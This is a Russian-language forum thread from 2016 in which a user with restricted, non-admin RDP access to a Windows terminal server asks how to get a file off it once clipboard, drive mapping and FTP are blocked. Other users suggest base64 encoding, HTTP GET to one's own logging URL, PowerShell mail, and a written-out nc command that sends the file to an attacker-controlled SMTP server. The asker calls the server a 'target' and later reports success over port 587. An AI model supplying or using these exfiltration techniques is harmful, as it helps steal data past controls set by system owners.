ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

17.03.2016, 00:41
|
|
Новичок
Регистрация: 16.03.2016
Сообщений: 6
Провел на форуме: 1602
Репутация:
1
|
|
Здравствуйте! Помогите советом как слить файл с сервера терминалов Windows Server 2008.
Есть доступ к серверу по RDP. Пользователь без админ. прав.
Буфер обмена и подключение дисков запрещено.
IE к интернету не подключается.
Команда FTP подключения к внешним серверам не производит.
пинги на сайты идут.
telnet на 80 порт mail.ru данные получает.
telnet на 25 порт подключается нормально.
Что то ничего в голову не идет.
Нет мыслей?
PS
Почту можно отправить, но как вложение прикрепить???
|
|
|

17.03.2016, 01:30
|
|
Познающий
Регистрация: 13.01.2014
Сообщений: 48
Провел на форуме: 17015
Репутация:
1
|
|
powershell + mail : )
или другие вариации.
|
|
|

17.03.2016, 01:50
|
|
Постоянный
Регистрация: 13.06.2015
Сообщений: 359
Провел на форуме: 137330
Репутация:
7
|
|
Вариант №1. Файл в base64 и GET на твой урл, который запишет в лог.
Вариант №2. Файл в base64. Поднимаешь у себя любой самый простой smtp-сервер на 25 порту, раз на него с того сервака разрешен конект. В шинде я не шарю вообще, но на линуксе я бы сделал так:
msg="ehlo hello server\nmail from:\nrcpt to:\ndata\nтут_base64_твоего_файла\r \n.\r\n";
echo -ne $msg | nc my_server 25
И смотришь во входящих. Ясень пень, всяких DKIM, PTR и прочих защит не должно быть.
|
|
|

17.03.2016, 02:07
|
|
Новичок
Регистрация: 16.03.2016
Сообщений: 6
Провел на форуме: 1602
Репутация:
1
|
|
Спасибо за идеи, бум пробовать завтра!
|
|
|

18.03.2016, 00:13
|
|
Новичок
Регистрация: 16.03.2016
Сообщений: 6
Провел на форуме: 1602
Репутация:
1
|
|
Подготовил скриптик, а 25 порт больше не гугу. Закрыли чтоли? Странно, еще вчера работал.
пытаюсь на мылру отправить через 465, так скрипт не пашет, пишет время ожидания истекло...
В общем бьюсь пока
|
|
|

18.03.2016, 00:18
|
|
Постоянный
Регистрация: 13.06.2015
Сообщений: 359
Провел на форуме: 137330
Репутация:
7
|
|
Сообщение от ChuckD
↑
Подготовил скриптик, а 25 порт больше не гугу. Закрыли чтоли? Странно, еще вчера работал.
пытаюсь на мылру отправить через 465, так скрипт не пашет, пишет время ожидания истекло...
В общем бьюсь пока
Мылрушка не пропустит такое письмо даже в спам.
|
|
|

18.03.2016, 00:25
|
|
Новичок
Регистрация: 16.03.2016
Сообщений: 6
Провел на форуме: 1602
Репутация:
1
|
|
С локальной машины и с другого сервера (также через RDP подключение) все ходит на ура на мылру через 25, пол дня тестировал. А щас начал на "целевом" пробовать - облом!
|
|
|

18.03.2016, 00:26
|
|
Новичок
Регистрация: 16.03.2016
Сообщений: 6
Провел на форуме: 1602
Репутация:
1
|
|
Подсоветуйте как быть, что попробовать...
|
|
|

18.03.2016, 02:23
|
|
Новичок
Регистрация: 16.03.2016
Сообщений: 6
Провел на форуме: 1602
Репутация:
1
|
|
Все! Всем спасибо, получилось!
оказывается при SSL через p-shell на 465 порт не идет - это стандартная проблема. Зато хорошо идет через 587! Если он не закрыт конечно
|
|
|

25.03.2016, 00:09
|
|
Новичок
Регистрация: 20.03.2016
Сообщений: 3
Провел на форуме: 943
Репутация:
0
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|